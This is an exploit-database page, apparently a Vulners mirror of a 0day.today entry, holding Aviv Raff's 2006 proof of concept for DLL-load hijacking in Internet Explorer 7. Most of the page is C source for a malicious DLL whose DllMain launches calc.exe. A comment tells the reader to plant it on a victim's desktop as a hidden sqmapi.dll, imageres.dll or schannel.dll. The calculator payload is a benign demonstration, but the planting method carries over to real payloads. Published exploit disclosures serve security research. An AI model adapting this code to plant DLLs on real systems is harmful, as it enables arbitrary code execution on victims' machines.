Lucene search

K

MS Internet Explorer 7 (DLL-load hijacking) Code Execution Exploit PoC

๐Ÿ—“๏ธย 14 Dec 2006ย 00:00:00Reported byย Aviv RaffTypeย 
zdt
ย zdt
๐Ÿ”—ย 0day.today๐Ÿ‘ย 6ย Views

MS Internet Explorer 7 DLL-load hijacking Code Execution Exploi

Show more
Code
======================================================================
MS Internet Explorer 7 (DLL-load hijacking) Code Execution Exploit PoC
======================================================================



/*
        Copyright (C) 2006-2007 Aviv Raff
        http://aviv.raffon.net
        Greetz: hdm, L.M.H, str0ke, SkyLined

        Compile and upload to the victim's desktop as one of the following hidden DLL files:
        - sqmapi.dll
        - imageres.dll
        - schannel.dll

        Run IE7 and watch the nice calculators pop up.
        Filter fdwReason to execute only once.

        Tested on WinXP SP2 with fully patched IE7.
        For testing/educational purpose only!

*/


#include <windows.h>

BOOL WINAPI DllMain(
  HINSTANCE hinstDLL,
  DWORD fdwReason,
  LPVOID lpvReserved
)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    TCHAR windir[_MAX_PATH];
    TCHAR cmd[ _MAX_PATH ];
    GetEnvironmentVariable("WINDIR",windir,_MAX_PATH );
    wsprintf(cmd,"%s\\system32\\calc.exe",windir);
    ZeroMemory(&si,sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi,sizeof(pi));
    CreateProcess(NULL,cmd,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return TRUE;
}



#  0day.today [2018-01-02]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
14 Dec 2006 00:00Current
7High risk
Vulners AI Score7
6
.json
Report